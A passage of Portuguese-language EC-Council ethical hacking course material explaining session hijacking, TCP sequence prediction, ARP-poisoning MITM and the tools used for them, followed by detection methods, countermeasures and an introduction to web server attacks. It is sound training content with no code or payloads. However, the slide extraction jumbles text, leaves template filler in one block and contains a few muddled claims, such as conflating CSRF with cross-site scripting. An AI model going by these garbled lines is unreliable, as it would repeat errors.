detecção de senha é o ataque mais simples para obter acesso bruto a uma rede. O combate a esse
ataque envolve métodos que variam de esquemas de identificação (por exemplo, sistemas de senha
de uso único, como S/KEY) a identificação de tíquetes (por exemplo, Kerberos).
Essas técnicas ajudam a proteger os dados contra ataques de sniffing, mas não podem proteger
contra ataques ativos se os dados não forem criptografados ou não tiverem uma assinatura digital.
ÿ Sequestro de Sessão Ativa
Em um ataque ativo, um invasor assume uma sessão existente interrompendo a conexão em um

lado da conversa ou participando ativamente. Um exemplo de ataque ativo é o ataque man-in-the-
middle (MITM). Para executar um ataque MITM bem-sucedido, o invasor deve adivinhar o número
da sequência antes que o alvo responda ao servidor. Na maioria das redes atuais, a previsão do
número de sequência não funciona porque os fornecedores de sistema operacional (SO) usam
valores aleatórios para o número de sequência inicial, o que dificulta a previsão dos números de
sequência.

Figura 6.41: Atacante farejando o tráfego da vítima

Sequestro de Sessão no Modelo OSI
Sequestro no nível da rede Seqüestro no nível do aplicativo
ÿ Definida como a interceptação de ÿ Refere-se a obter controle

pacotes durante a transmissão sobre a sessão do usuário
entre um cliente e o servidor em HTTP obtendo os IDs da sessão
uma sessão TCP ou UDP
Sequestro de Sessão no Modelo OSI
Existem dois níveis de seqüestro de sessão no modelo OSI: o nível da rede e o nível do aplicativo.
ÿ Sequestro no nível da rede
Seqüestro de nível de rede é a interceptação de pacotes durante a transmissão entre um cliente

e um servidor em uma sessão TCP/User Datagram Protocol (UDP). Um ataque bem-sucedido
fornece ao invasor informações cruciais, que podem ser usadas posteriormente para atacar
sessões no nível do aplicativo. Os invasores provavelmente executam o seqüestro no nível da
rede porque não precisam modificar o ataque por aplicativo da web. Esse ataque se concentra
no fluxo de dados do protocolo compartilhado por todos os aplicativos da web.
ÿ Seqüestro de nível de aplicativo
O seqüestro no nível do aplicativo envolve obter controle sobre a sessão do usuário HTTP
(Hypertext Transfer Protocol) obtendo os IDs da sessão. No nível do aplicativo, o invasor obtém
o controle de uma sessão existente e pode criar novas sessões não autorizadas usando dados
roubados. Em geral, ambos ocorrem juntos, dependendo do sistema que está sendo atacado.

Spoofing vs. Hijacking

Ataque de falsificação Sequestro
Um invasor finge ser outro usuário ou máquina Sequestro de sessão é o processo de assumir o
(vítima) para obter acesso controle de uma sessão ativa existente
O invasor não assume o controle de uma sessão ativa

O invasor depende do usuário legítimo para criar
existente; em vez disso, ele ou ela inicia uma nova
uma conexão e autenticar
sessão usando as credenciais roubadas da vítima
James faz logon no

servidor com suas credenciais
Prevê a
James Servidor
James Servidor sequência e mata
(Vítima) conexão de James
(Vítima)
João (Atacante)
João (Atacante)
Spoofing vs. Hijacking
No sequestro cego, um invasor prevê os números de sequência que um host vítima envia para criar uma conexão
que parece originar-se do host ou de uma falsificação cega. Para entender o seqüestro cego, é importante
entender a previsão do número de sequência. Os números de sequência TCP, que são exclusivos por byte em
uma sessão TCP, fornecem controle de fluxo e integridade de dados. Os segmentos TCP fornecem o número de
sequência inicial (ISN) como parte de cada cabeçalho de segmento. Os ISNs não começam em zero para cada
sessão. Como parte do processo de handshake, cada participante precisa declarar o ISN e os bytes são
numerados sequencialmente a partir desse ponto.
O seqüestro de sessão às cegas depende da capacidade do invasor de prever ou adivinhar números de sequência.
Um invasor não consegue falsificar um host confiável em uma rede diferente e observar os pacotes de resposta
porque não existe nenhuma rota para os pacotes retornarem ao endereço IP do invasor. Além disso, o invasor
não pode recorrer ao envenenamento de cache do Address Resolution Protocol (ARP) porque os roteadores não
transmitem ARP pela Internet. Como o invasor não consegue observar as respostas, ele deve antecipar as
respostas da vítima e evitar que o host envie um pacote TCP/RST para a vítima. O invasor prevê números de
sequência que o host remoto espera da vítima e então sequestra a comunicação. Este método é útil para explorar
as relações de confiança entre usuários e máquinas remotas.
Em um ataque de falsificação, um invasor finge ser outro usuário ou máquina (vítima) para obter acesso.
Em vez de assumir uma sessão ativa existente, o invasor inicia uma nova sessão usando as credenciais roubadas
da vítima. A falsificação simples de IP é fácil de executar e é útil em vários métodos de ataque. Para criar novos
pacotes brutos, o invasor deve ter acesso root na máquina.
No entanto, para estabelecer uma conexão falsificada usando essa técnica de sequestro de sessão, um invasor
deve conhecer os números de sequência usados por uma máquina de destino. A falsificação de IP força o invasor a

previsão do NSN. Quando um invasor usa o seqüestro cego para enviar um comando, ele não pode visualizar
a resposta.
No caso de falsificação de IP sem um seqüestro de sessão, adivinhar o número de sequência é desnecessário

porque não existe nenhuma sessão aberta no momento com esse endereço IP. Em um seqüestro de sessão,
o tráfego retorna ao invasor apenas se o roteamento de origem for usado. O roteamento de origem é um
processo que permite ao remetente especificar a rota a ser seguida por um pacote IP até o destino. O invasor
executa o roteamento de origem e, em seguida, fareja o tráfego à medida que passa pelo invasor. Na
falsificação de sessão, as credenciais de autenticação capturadas são usadas para estabelecer uma sessão.
Em contraste, o sequestro ativo eclipsa uma sessão pré-existente. Como resultado desse ataque, um usuário
legítimo pode perder o acesso ou a funcionalidade normal de sua sessão Telnet estabelecida porque um
invasor sequestra a sessão e age com os privilégios do usuário. Como a maioria dos mecanismos de
autenticação é aplicada apenas no início de uma sessão, o invasor pode obter acesso a uma máquina de
destino sem autenticação enquanto uma sessão está em andamento.
Outro método é usar pacotes IP roteados de origem. Esse tipo de ataque MITM permite que um invasor se
torne parte da conversa alvo-host, guiando enganosamente os pacotes IP para passar por seu sistema.
Seqüestro de sessão é o processo de assumir uma sessão ativa existente. Um invasor depende de um
usuário legítimo para fazer uma conexão e autenticar. O sequestro de sessão é mais difícil do que a
falsificação de endereço IP. No seqüestro de sessão, John (um invasor) tentaria se inserir em uma sessão
que James (um usuário legítimo) já havia configurado com \\Mail. John esperaria até que James estabelecesse
uma sessão, deslocaria James da sessão estabelecida por alguns meios, como um ataque DoS, e então
retomaria a sessão como se fosse James. Posteriormente, John enviaria um conjunto de pacotes com script
para \\Mail e observaria as respostas. Para isso, John precisa saber o número de sequência em uso quando
ele invadiu a sessão. Para calcular o número de sequência, ele deve saber o ISN e a quantidade de pacotes
envolvidos no processo de troca.
O seqüestro de sessão bem-sucedido é difícil sem o uso de ferramentas conhecidas e só é possível quando
vários fatores estão sob o controle do invasor. O conhecimento do ISN é o menor dos desafios de John. Por
exemplo, John precisa de um método para deslocar James da sessão ativa, bem como um método para
saber o status exato da sessão de James no momento em que James é deslocado.
Ambas as tarefas exigem que John tenha muito mais conhecimento e controle sobre a sessão do que
normalmente seria possível.
No entanto, os ataques de falsificação de endereços IP só podem ser bem-sucedidos se um invasor usar

endereços IP para autenticação. Eles não podem executar falsificação de endereço IP ou seqüestro de
sessão se a verificação de integridade por pacote for executada. Da mesma forma, a falsificação de endereço
IP ou o sequestro de sessão não é possível se a sessão usar métodos de criptografia como Secure Sockets
Layer (SSL) ou Point to Point Tunneling Protocol (PPTP). Consequentemente, o invasor não pode participar
da troca de chaves.

Figura 6.42: Ataque de falsificação
Figura 6.43: Sequestro de sessão
Em resumo, o sequestro de comunicações TCP não criptografadas requer a presença de tráfego

orientado a sessão não criptografado, a capacidade de reconhecer números de sequência TCP a
partir dos quais o próximo número de sequência (NSN) pode ser previsto e a capacidade de falsificar
a mídia de um host controle de acesso (MAC) ou endereço IP para receber comunicações que não
são destinadas ao host do invasor. Se o invasor estiver no segmento local, ele pode farejar e prever
o número ISN + 1 e rotear o tráfego de volta para eles envenenando os caches ARP nos dois hosts
legítimos que participam da sessão.

Ferramentas de Sequestro de Sessão
OWASP Uma ferramenta integrada de teste de penetração para

ZAP Burp Suite
encontrar vulnerabilidades em aplicativos da web
https:// portswigger.net
bettercap
https:// www.bettercap.org
kit de ferramentas netool
WebSploit Framework
sslstrip
https:// pypi.org
https:// owasp.org
Ferramentas de Sequestro de Sessão
Os invasores podem usar ferramentas como Burp Suite, OWASP ZAP e bettercap para sequestrar uma sessão entre um
cliente e um servidor. A seguir, são discutidas várias ferramentas que ajudam a executar o seqüestro de sessão.
ÿ OWASP ZAP
Fonte: https:// owasp.org
OWASP Zed Attack Proxy (ZAP) é uma ferramenta integrada de teste de penetração para encontrar vulnerabilidades
em aplicativos da web. Ele oferece scanners automatizados, bem como um conjunto de ferramentas que possibilitam
encontrar vulnerabilidades de segurança manualmente. Ele foi projetado para ser usado por pessoas com ampla
experiência em segurança e é ideal para desenvolvedores e testadores funcionais que são novos em testes de
penetração.

Figura 6.44: Captura de tela do Burp Suite
A seguir estão algumas ferramentas adicionais de sequestro de sessão:
ÿ Burp Suite (https:// portswigger.net)
ÿ bettercap (https:// www.bettercap.org)
ÿ kit de ferramentas netool (https:// sourceforge.net)
ÿ WebSploit Framework (https:// sourceforge.net)
ÿ sslstrip (https:// pypi.org)

Fluxo do módulo
Discutir tipos de sessão

Ataques de sequestro
Discutir o seqüestro de sessão

Copyright © de Copyright © de EC-Council Council. Todos os direitos reservados. A reprodução é estritamente proibida. Todos os direitos reservados. A reprodução é estritamente proibida.
Discutir contramedidas de ataque de sequestro de sessão

Em geral, o sequestro é um ataque perigoso porque a vítima corre o risco de roubo de identidade, fraude e
perda de informações confidenciais. Todas as redes que usam TCP/IP são vulneráveis a diferentes tipos de
ataques de seqüestro de sessão. No entanto, seguir as práticas recomendadas pode proteger contra ataques
de sequestro de sessão.
Esta seção discute métodos de detecção de sequestro de sessão e várias contramedidas para combater
ataques de sequestro de sessão.

Detecção de Sequestro de Sessão

nosso recurso
Métodos
Por favor, escreva seu grande título está aqui
Mas devo explicar a você como toda essa ideia equivocada de

Método de
denunciando o prazer e elogiando Detecção
a dor nasceu
conta do sistema, alguma vantagem dele?
Método manual Método Automático
Usando Pacote Detecção de intruso
Software de detecção Sistemas (IDS)
Prevenção de Intrusão
Sistemas (IPS)
Métodos de detecção de sequestro de sessão
Os ataques de sequestro de sessão são excepcionalmente difíceis de detectar e os usuários geralmente os ignoram, a
menos que o invasor cause danos graves.
A seguir estão alguns sintomas de um ataque de sequestro de sessão:
ÿ Uma explosão de atividade de rede por algum tempo, o que diminui o desempenho do sistema
ÿ Servidores ocupados resultantes de solicitações enviadas pelo cliente e pelo sequestrador
Métodos para detectar o seqüestro de sessão
Figura 6.45: Métodos de detecção de sequestro de sessão

ÿ Método Manual
O método manual envolve o uso de software de detecção de pacotes, como Wireshark e SteelCentral Packet
Analyzer, para monitorar ataques de sequestro de sessão. O sniffer de pacotes captura pacotes em trânsito
pela rede, que são analisados usando várias ferramentas de filtragem.
Entrada ARP Forçada
Uma entrada ARP forçada envolve a substituição do endereço MAC de uma máquina comprometida no cache
ARP do servidor por um endereço diferente, a fim de restringir o tráfego de rede para a máquina comprometida.
Uma entrada ARP forçada deve ser executada no caso do seguinte:
o Atualizações ARP repetidas
o Frames enviados entre o cliente e o servidor com diferentes endereços MAC
o tempestades de ACK
ÿ Método Automático
O método automático envolve o uso de sistemas de detecção de intrusão (IDS) e sistemas de prevenção de
intrusão (IPS) para monitorar o tráfego de entrada na rede. Se o pacote corresponder a qualquer uma das
assinaturas de ataque no banco de dados interno, o IDS gera um alerta, enquanto o IPS bloqueia a entrada
do tráfego no banco de dados.

Contramedidas de Sequestro de Sessão

Use Secure Shell (SSH) para criar um canal de comunicação seguro
Implemente a funcionalidade de logout para o usuário encerrar a sessão
Gere o ID da sessão após um login bem-sucedido e aceite apenas os IDs da sessão gerados
pelo servidor
Certifique-se de que os dados em trânsito sejam criptografados e implemente o mecanismo

de defesa em profundidade
Use string ou um número aleatório longo como uma chave de sessão
Use nomes de usuários e senhas diferentes para contas diferentes
Contramedidas de Sequestro de Sessão
Listadas abaixo estão algumas das contramedidas a serem seguidas para se defender contra o seqüestro de sessão:
ÿ Use o Secure Shell (SSH) para criar um canal de comunicação seguro.
ÿ Passe cookies de autenticação por conexões HTTPS.
ÿ Implemente a funcionalidade de logout para o usuário encerrar a sessão.
ÿ Gere um ID de sessão após um login bem-sucedido e aceite os IDs de sessão gerados pelo
servidor apenas.
ÿ Garantir que os dados em trânsito sejam criptografados e implementar a defesa em profundidade

mecanismo.
ÿ Use strings ou números aleatórios longos como chaves de sessão.
ÿ Use nomes de usuário e senhas diferentes para contas diferentes.
ÿ Eduque os funcionários e minimize o acesso remoto.
ÿ Implemente timeout() para destruir sessões quando expiradas.
ÿ Evite incluir o ID da sessão no URL ou string de consulta.
ÿ Use switches em vez de hubs e limite as conexões de entrada.
ÿ Certifique-se de que o software de proteção do lado do cliente e do lado do servidor esteja no estado ativo e até
encontro.
ÿ Use autenticação forte (como Kerberos) ou redes privadas virtuais ponto a ponto
(VPN).

ÿ Configure as regras de falsificação internas e externas apropriadas nos gateways.
ÿ Use protocolos criptografados disponíveis no pacote OpenSSH.
ÿ Use firewalls e configurações do navegador para limitar os cookies.
ÿ Proteja os cookies de autenticação com SSL.
ÿ Atualize regularmente patches de plataforma para corrigir vulnerabilidades de TCP/IP (por exemplo, pacotes previsíveis
sequências).
ÿ Use IPsec para criptografar as informações da sessão.
ÿ Use HTTP Public Key Pinning (HPKP) para permitir que os usuários autentiquem servidores da web.
ÿ Habilite os navegadores para verificar a autenticidade do site usando servidores notariais de rede.
ÿ Implementar autenticação baseada em DNS de entidades nomeadas.
ÿ Desabilitar mecanismos de compressão de solicitações HTTP.
ÿ Use cifras de bloco de encadeamento de cifras (CBC) incorporando preenchimento aleatório de até 255 bytes, dificultando
assim a extração de informações confidenciais para um invasor.
ÿ Restrinja os scripts cross-site conhecidos como cross-site request forgery (CSRF) do cliente
lado.
ÿ Atualize os navegadores da Web para as versões mais recentes.
ÿ Use scanners de vulnerabilidade, como masscan, para detectar qualquer configuração insegura de
Configurações de sessão HTTPS em sites.

Ferramentas de Detecção de Sequestro de Sessão
ÿ O Wireshark permite capturar e navegar interativamente pelo tráfego em execução

Wireshark
em uma rede de computadores
USM Anywhere
https:// cybersecurity.att.com
Check Point IPS

https:// www.checkpoint.com
LogRhythm
https:// logrhythm.com
SolarWinds Security Event Manager (SEM) https://
www.solarwinds.com
Sistema de Prevenção de Intrusão da

IBM Security Network https://
www.ibm.com
https:// www.wireshark.org
Ferramentas de Detecção de Sequestro de Sessão
ÿ Wireshark
Fonte: https:// www.wireshark.org
O Wireshark permite aos usuários capturar e navegar interativamente pelo tráfego em uma rede. Esta
ferramenta usa Winpcap para capturar pacotes. Portanto, ele só pode capturar pacotes nas redes suportadas
pelo Winpcap. Ele captura tráfego de rede ao vivo de Ethernet, IEEE 802.11, protocolo ponto a ponto/controle
de link de dados de alto nível (PPP/HDLC), modo de transferência assíncrona (ATM), Bluetooth, barramento
serial universal (USB), token ring, quadro Redes de retransmissão e interface de dados distribuídos por fibra
(FDDI). Os profissionais de segurança usam o Wireshark para monitorar e detectar tentativas de sequestro de
sessão.

Figura 6.46: captura de tela do Wireshark
A seguir estão algumas ferramentas adicionais de detecção de sequestro de sessão:
ÿ USM Anywhere (https:// cybersecurity.att.com)

ÿ Check Point IPS (https:// www.checkpoint.com)
ÿ LogRhythm (https:// logrhythm.com)
ÿ SolarWinds Security Event Manager (SEM) (https:// www.solarwinds.com)
ÿ IBM Security Network Intrusion Prevention System (https:// www.ibm.com)

Resumo do Módulo
Este módulo discutiu o sniffing de pacotes e os tipos de sniffing
Ele cobriu várias técnicas de sniffing e ferramentas de sniffing
Ele também discutiu diferentes contramedidas de sniffing
Ele cobriu diferentes tipos de ataques DoS e DDoS e ferramentas de ataque
Ele também discutiu diferentes contramedidas de ataque DoS/DDoS e ferramentas de proteção
Ele abordou o sequestro de sessão e os tipos de ataques e ferramentas de sequestro de sessão
Finalmente, este módulo terminou com uma discussão detalhada sobre várias contramedidas para
defender tentativas de sequestro de sessão
No próximo módulo, discutiremos em detalhes vários ataques e contramedidas de aplicativos

da web
Resumo do Módulo
Este módulo discutiu o sniffing de pacotes e os tipos de sniffing. Ele cobriu várias técnicas de detecção e
ferramentas de detecção. Ele também discutiu diferentes contramedidas de detecção. Além disso, cobriu os
diferentes tipos de ataques DoS e DDoS, bem como demonstrou várias ferramentas de ataque DoS/DDoS.
Além disso, também discutiu diferentes contramedidas de ataque DoS/DDoS e ferramentas de proteção. Ele
cobriu o sequestro de sessão e também os tipos de ataques de sequestro de sessão.
Por fim, o módulo terminou com uma discussão detalhada sobre ferramentas de sequestro de sessão e várias
contramedidas para defender tentativas de sequestro de sessão.
No próximo módulo, discutiremos em detalhes os vários ataques a aplicativos da web e

contramedidas.
MT
EC-Council
CE-Conselho
E
Ethical
HE
Hacking Essentials
Módulo 07
Ataques e contramedidas de aplicativos da Web

1 Compreendendo os conceitos e ataques do servidor da Web
Compreendendo diferentes ferramentas de ataque ao servidor da Web e

2 Contramedidas
3 Visão geral da arquitetura de aplicativos da Web e da pilha de vulnerabilidades
4 Compreendendo diferentes ameaças e ataques a aplicativos da Web
Compreendendo diferentes ferramentas de ataque a aplicativos da Web e

5 Contramedidas
6 Visão geral dos diferentes tipos de ataques de injeção de SQL
7 Compreendendo diferentes ferramentas de injeção de SQL
8 Compreendendo diferentes contramedidas de ataque de injeção de SQL
A evolução da Internet e das tecnologias da Web, combinada com o rápido aumento da conectividade com a Internet, levou ao
surgimento de um novo cenário de negócios. Os aplicativos da Web são um componente integral dos negócios online. Todo
mundo conectado via Internet está usando vários aplicativos da web para diferentes propósitos, incluindo compras online, e-mail,
chats e redes sociais.
Os aplicativos da Web estão se tornando cada vez mais vulneráveis a ameaças sofisticadas e vetores de ataque. Este módulo
familiariza os alunos com ataques e contramedidas de servidores da Web. Ele discute a arquitetura de aplicativos da Web e a
pilha de vulnerabilidades. Este módulo também familiariza os alunos com várias ameaças, ataques e contramedidas de aplicativos
da Web. Além disso, discute diferentes tipos de ataques de injeção de linguagem de consulta estruturada (SQL) e
contramedidas.
No final deste módulo, os alunos serão capazes de fazer o seguinte:
ÿ Descrever as operações do servidor web e questões de segurança
ÿ Explicar vários ataques de servidor web e ferramentas de ataque de servidor web
ÿ Adotar contramedidas contra ataques de servidor web
ÿ Use diferentes ferramentas de segurança do servidor web
ÿ Descrever a arquitetura de aplicativos da Web e a pilha de vulnerabilidades
ÿ Explicar várias ameaças e ataques de aplicativos da web
ÿ Use diferentes ferramentas de ataque de aplicativos da web
ÿ Adotar contramedidas contra ataques de aplicativos da web

ÿ Use diferentes ferramentas de segurança de aplicativos da web
ÿ Compreender os diferentes tipos de ataques de injeção de SQL
ÿ Use diferentes ferramentas de injeção de SQL
ÿ Adotar contramedidas contra ataques de injeção de SQL
ÿ Use diferentes ferramentas de detecção para injeção de SQL

Servidor web
Ataques
Ataques de Servidor Web
Para entender o hacking do servidor web, é essencial primeiro entender os conceitos básicos do servidor
web, incluindo o que é um servidor web, como ele funciona e outros elementos associados a ele.
Esta seção fornece uma breve visão geral de como um servidor web opera. Ele também explicará fatores
ou erros comuns que permitem que invasores invadam um servidor da web. Esta seção também discute os
vários ataques de servidor da Web, ferramentas de ataque, contramedidas de ataque e ferramentas de
segurança.

Fluxo do módulo
Discutir Vários Servidores Web

01
Ataques
Discutir o ataque do servidor da Web

02
Contramedidas
Discutir vários ataques de servidor da Web
Um invasor pode usar muitas técnicas para comprometer um servidor da web, como sequestro de servidor
DNS (Domain Name System), amplificação de DNS, travessia de diretório, desfiguração de site, configuração
incorreta do servidor da web, divisão de resposta HTTP, envenenamento de cache da web, Secure Shell (SSH)
bruto força, quebra de senha do servidor web e ataque de falsificação de solicitação do lado do servidor
(SSRF). Esta seção descreve essas técnicas de ataque em detalhes.

Operações do Servidor Web

Um servidor web é um sistema de computador que armazena, processa e
entrega páginas da web para clientes via HTTP
Estático Inscrição
Banco de dados Banco de dados
Dados Estáticos
Resposta
Inscrição
Típico Cliente-Servidor Solicitação de servlet
Servidor
Operação do Servidor Web Servidor web
Contêiner da Web
Resposta do Servlet
HTTP HTTP Outros serviços

Solicitar Resposta
Cliente da web
Operações do Servidor Web
Um servidor web é um sistema de computador que armazena, processa e entrega páginas da web para
clientes globais por meio do protocolo de transferência de hipertexto (HTTP). Em geral, um cliente inicia
um processo de comunicação por meio de solicitações HTTP. Quando um cliente deseja acessar
qualquer recurso, como páginas da Web, fotos e vídeos, o navegador do cliente gera uma solicitação
HTTP que é enviada ao servidor da Web. Dependendo da solicitação, o servidor da Web coleta as
informações/conteúdos solicitados do armazenamento de dados ou servidores de aplicativos e responde
à solicitação do cliente com uma resposta HTTP apropriada. Se um servidor da Web não conseguir
encontrar as informações solicitadas, ele gerará uma mensagem de erro.
Figura 7.1: Típica comunicação cliente-servidor na operação do servidor web

Componentes do Servidor Web
Raiz do Documento Raiz do Servidor Árvore de Documentos Virtuais

Armazena arquivos HTML críticos Armazena a configuração, erro, Fornece armazenamento em uma
relacionados às páginas da Web executável e arquivos de log do servidor máquina ou disco diferente depois que
de um nome de domínio que serão o disco original é preenchido
ser servido em resposta aos
pedidos
Hospedagem Virtual Proxy Web

Técnica de hospedagem de Servidor proxy que fica entre o cliente
vários domínios ou sites no web e o servidor web para evitar o
mesmo bloqueio de IP e manter o anonimato
servidor
Componentes do Servidor Web
Um servidor web consiste nos seguintes componentes:
ÿ Raiz de Documentos
A raiz do documento é um dos diretórios de arquivos raiz do servidor da web que armazena arquivos HTML críticos
relacionados às páginas da web de um nome de domínio, que serão enviados em resposta às solicitações.
Por exemplo, se a URL solicitada for www.certifiedhacker.com e a raiz do documento for denominada “certroot” e
estiver armazenada no diretório /admin/ web, / admin/ web/ certroot será o endereço do diretório do documento.
Se a solicitação completa for www.certifiedhacker.com/ P-folio/ index.html, o servidor procurará o caminho do

arquivo /admin/ web/ certroot/ P-folio/ index.html.
ÿ Servidor Raiz
É o diretório raiz de nível superior sob a árvore de diretórios em que a configuração do servidor e os arquivos de
log, executáveis e de erro são armazenados. Consiste no código que implementa o servidor. A raiz do servidor, em
geral, consiste em quatro arquivos. Um arquivo é dedicado ao código que implementa o servidor, enquanto os
outros três são subdiretórios, ou seja, -conf, -logs e -cgi-bin, que são usados para informações de configuração,
logs e executáveis, respectivamente.
ÿ Árvore Virtual de Documentos
Uma árvore de documento virtual fornece armazenamento em uma máquina ou disco diferente depois que o disco
original fica cheio. Ele diferencia maiúsculas de minúsculas e pode ser usado para fornecer segurança em nível de
objeto.

No exemplo acima, na raiz do documento, para uma solicitação de www.certifiedhacker.com/ P-folio/ index.html, o servidor
também pode pesquisar o caminho do arquivo /admin/ web/ certroot/ P-folio/ index.html se o diretório admin/ web/ certroot
é armazenado em outro disco.
ÿ Hospedagem Virtual
É uma técnica de hospedagem de vários domínios ou sites no mesmo servidor. Esta técnica permite o compartilhamento
de recursos entre vários servidores. É empregado em empresas de grande porte, nas quais os recursos da empresa se
destinam a serem acessados e gerenciados globalmente.
A seguir estão os tipos de hospedagem virtual:
o Hospedagem baseada em nome
o Hospedagem baseada em Protocolo de Internet (IP)
o Hospedagem baseada em porta
ÿ Proxy Web
Um servidor proxy está localizado entre o cliente web e o servidor web. Devido à colocação de proxies da web, todas as
solicitações dos clientes são repassadas ao servidor da web por meio dos proxies da web. Eles são usados para impedir
o bloqueio de IP e manter o anonimato.

Problemas de segurança do servidor da Web
ÿ Os invasores geralmente visam vulnerabilidades de software e erros de configuração para comprometer

servidores
ÿ Ataques em nível de rede e sistema operacional podem ser bem defendidos usando medidas adequadas de segurança de rede
como firewalls, IDS, etc. No entanto, os servidores web podem ser acessados de qualquer lugar via Internet, o que os torna
altamente vulneráveis a ataques
Aplicativos da Web personalizados Pilha 7 Falhas de Lógica de Negócios
Componentes de terceiros Pilha 6 Código aberto/comercial
Servidor web Pilha 5
Base de dados
Pilha 4 Oracle/MySQL/MS SQL
Sistema operacional Windows/Linux/macOS

Pilha 3
Rede Roteador/Switch
Pilha 2
Segurança IP/IDS
Pilha 1
Problemas de segurança do servidor da Web
Um servidor web é um aplicativo de hardware/software que hospeda sites e os torna acessíveis pela Internet. Um servidor web,
junto com um navegador, implementa com sucesso a arquitetura do modelo cliente-servidor. Nesse modelo, o servidor web
desempenha o papel de servidor e o navegador atua como cliente. Para hospedar sites, um servidor da web armazena as páginas
da web dos sites e entrega uma página da web específica mediante solicitação. Cada servidor web tem um nome de domínio e um
endereço IP associado a esse nome de domínio. Um servidor web pode hospedar mais de um site. Qualquer computador pode
funcionar como um servidor web se tiver um software de servidor específico (um programa de servidor web) instalado e conectado
à Internet.
Os servidores da Web são escolhidos com base em sua capacidade de lidar com programação do lado do servidor, características
de segurança, publicação, mecanismos de pesquisa e ferramentas de criação de sites. Apache, Microsoft IIS, Nginx, Google e
Tomcat são alguns dos softwares de servidor web mais usados. Um invasor geralmente visa vulnerabilidades no componente de
software e erros de configuração para comprometer a web
servidores.
Figura 7.2: Diagrama conceitual de um servidor web: o usuário visita sites hospedados em um servidor web

As organizações podem defender a maioria dos ataques em nível de rede e de sistema operacional adotando medidas de
segurança de rede, como firewalls, sistemas de detecção de intrusão (IDSs) e sistemas de prevenção de intrusão (IPSs) e
seguindo padrões e diretrizes de segurança. Isso força os invasores a voltarem sua atenção para ataques em nível de servidor e
aplicativo da Web porque um servidor da Web que hospeda aplicativos da Web pode ser acessado de qualquer lugar pela Internet.
Isso torna os servidores da Web um alvo atraente. Servidores web mal configurados podem criar vulnerabilidades até mesmo nos
sistemas de firewall mais cuidadosamente projetados. Os invasores podem explorar servidores da web mal configurados com
vulnerabilidades conhecidas para comprometer a segurança dos aplicativos da web. Além disso, servidores web com
vulnerabilidades conhecidas podem prejudicar a segurança de uma organização. Conforme mostrado na figura abaixo, a segurança
organizacional inclui sete níveis da pilha 1 à pilha 7.
Figura 7.3: Níveis de segurança organizacional
Objetivos comuns por trás do hacking de servidores da Web
Os invasores executam ataques ao servidor da Web com determinados objetivos em mente. Esses objetivos podem ser técnicos
ou não técnicos. Por exemplo, os invasores podem violar a segurança de um servidor da Web e roubar informações confidenciais
para ganhos financeiros ou apenas por curiosidade.
A seguir estão alguns objetivos comuns de ataques de servidor web:
ÿ Roubar detalhes de cartão de crédito ou outras credenciais confidenciais usando técnicas de phishing
ÿ Integrar o servidor em um botnet para executar negação de serviço (DoS) ou DoS distribuído
(DDoS) ataques
ÿ Comprometendo um banco de dados
ÿ Obtenção de aplicações de código fechado
ÿ Ocultar e redirecionar o tráfego
ÿ Escalar privilégios
Alguns ataques são realizados por motivos pessoais, ao invés de ganhos financeiros:
ÿ Por pura curiosidade

ÿ Por completar um desafio intelectual autodefinido
ÿ Por prejudicar a reputação da organização alvo
Falhas de segurança perigosas que afetam a segurança do servidor da Web
Um servidor web configurado por administradores de sistema mal treinados pode ter vulnerabilidades de segurança.
Conhecimento inadequado, negligência, preguiça e desatenção em relação à segurança podem representar as maiores
ameaças à segurança do servidor web.
A seguir estão alguns descuidos comuns que tornam um servidor web vulnerável a ataques:
ÿ Falha ao atualizar o servidor web com os patches mais recentes
ÿ Usando as mesmas credenciais de administrador do sistema em todos os lugares
ÿ Permitir tráfego interno e de saída irrestrito
ÿ Executando aplicativos e servidores não protegidos

Impacto dos ataques ao servidor da Web
Acesso root a outros aplicativos

Comprometimento de contas de usuário
ou servidores
desfiguração do site ` Adulteração de dados e roubo de dados
Ataques secundários do Danos à reputação do

site empresa
Impacto dos ataques ao servidor da Web
Os invasores podem causar vários tipos de danos a uma organização atacando um servidor da web. A seguir
estão alguns dos tipos de danos que os invasores podem causar a um servidor da web.
ÿ Comprometimento de contas de usuários: os ataques de servidor da Web concentram-se principalmente

em comprometer contas de usuários. Se o invasor comprometer uma conta de usuário, poderá obter
uma grande quantidade de informações úteis. O invasor pode usar a conta de usuário comprometida
para lançar novos ataques no servidor da web.
ÿ Desfiguração do site: os invasores podem alterar completamente a aparência de um site, substituindo

seus dados originais. Eles desfiguram o site de destino alterando o visual e exibindo diferentes páginas
com mensagens próprias.
ÿ Ataques secundários do site: um invasor que compromete um servidor da Web pode usar o servidor
para lançar novos ataques em vários sites ou sistemas clientes.
ÿ Acesso raiz a outros aplicativos ou servidor: o acesso raiz é o nível de privilégio mais alto para efetuar
login em um servidor, independentemente de o servidor ser um servidor dedicado, semi-dedicado ou
privado virtual. Os invasores podem executar qualquer ação assim que obtiverem acesso root ao
servidor.
ÿ Adulteração de dados: um invasor pode alterar ou excluir os dados de um servidor da Web e até
substituir os dados por malware para comprometer os usuários que se conectam ao servidor da Web.
ÿ Roubo de dados: os dados estão entre os principais ativos de uma organização. Os invasores podem
obter acesso a dados confidenciais, como registros financeiros, planos futuros ou o código-fonte de um
programa.

ÿ Prejudicar a reputação da empresa: ataques a servidores da Web podem expor ao público

as informações pessoais dos clientes de uma empresa, prejudicando a reputação da
empresa. Consequentemente, os clientes perdem a confiança na empresa e ficam com
medo de compartilhar seus dados pessoais com a empresa.

Por que os servidores da Web estão comprometidos?
Falta de políticas, procedimentos e

Permissões impróprias de arquivos e diretórios
manutenção de segurança adequados
Autenticação imprópria com sistemas externos

Instalação do servidor com configurações padrão
Habilitação de serviços desnecessários,

Contas padrão com senhas padrão ou
incluindo gerenciamento de conteúdo e
administração remota sem senhas
Conflitos de segurança com caso de Erros de configuração no servidor web,

facilidade de uso comercial sistemas operacionais e redes
Por que os servidores da Web estão comprometidos?
Existem riscos de segurança inerentes associados aos servidores da Web, às redes locais (LANs) que hospedam
sites e aos usuários finais que acessam esses sites usando navegadores.
ÿ Perspectiva do webmaster: Do ponto de vista de um webmaster, a maior preocupação de segurança é que

um servidor web pode expor a LAN ou a intranet corporativa a ameaças impostas pela Internet. Essas
ameaças podem estar na forma de vírus, cavalos de Tróia, invasores ou comprometimento de dados. Bugs
em programas de software geralmente são fontes de lapsos de segurança.
Os servidores da Web, que são dispositivos grandes e complexos, também apresentam esses riscos
inerentes. Além disso, a arquitetura aberta dos servidores da Web permite que scripts arbitrários sejam
executados no lado do servidor enquanto respondem a solicitações remotas. Qualquer script CGI (Common
Gateway Interface) instalado no servidor da Web pode conter bugs que são falhas de segurança em potencial.
